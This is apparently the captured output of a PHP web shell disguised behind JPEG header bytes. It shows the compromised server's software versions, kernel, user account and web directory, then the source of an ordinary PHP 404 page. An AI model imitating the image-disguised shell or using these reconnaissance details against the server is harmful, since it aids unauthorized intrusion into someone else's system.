ÿØÿà JFIF ÿÛ „ ( %"1"%)+...383,7(-.-
![]() Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20 System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64 User : apache ( 48) PHP Version : 7.4.20 Disable Function : NONE Directory : /var/www/html/sharefilefree/ |
<?php //just for nicier setup routines if (preg_match('|/setup\.php$|',$_SERVER["REQUEST_URI"])) { header("location: ./"); exit; } if (!headers_sent()) { header("HTTP/1.0 404 Not Found"); } $currPage = "notfound"; include_once("includes/header.php"); ?> <div class="container"> <div class="row"> <div class='col-xs-12 text-center'> <h1 class='text-danger'>Oops! Page not found...</h1> <p><?php echo lang("info_404notfound"); ?></p> <h2 class='error404'><i class='fa fa-chain-broken'></i> 404 <small class='text-muted'>not found</small></h2> </div> </div> </div> <?php include("includes/footer.php"); ?>